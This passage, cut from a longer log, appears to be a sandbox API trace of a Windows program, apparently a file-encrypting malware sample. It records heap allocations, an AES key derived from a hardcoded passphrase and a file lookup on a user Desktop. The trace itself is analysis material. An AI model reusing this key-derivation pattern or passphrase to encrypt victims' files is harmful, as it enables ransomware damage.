hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0124.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0124.285] CloseHandle (hObject=0x258) returned 1 [0124.285] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0124.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120f2ee0, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0xd5a93410, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0xd5a93410, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0x6e44, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="MDF9dFhi.gif", cAlternateFileName="")) returned 0x41ac100 [0124.285] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0124.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0124.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0124.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0124.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0124.286] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.287] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0124.287] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0124.287] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.287] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0124.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0124.288] CryptHashData (hHash=0x41ac780, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0124.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.288] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0124.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca8f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0124.288] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0124.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0124.289] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0124.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0124.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0124.291] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0124.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0124.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0124.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0124.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0124.292] CryptDestroyHash (hHash=0x41ac780) returned 1 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0124.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0124.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0124.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0124.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0124.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, 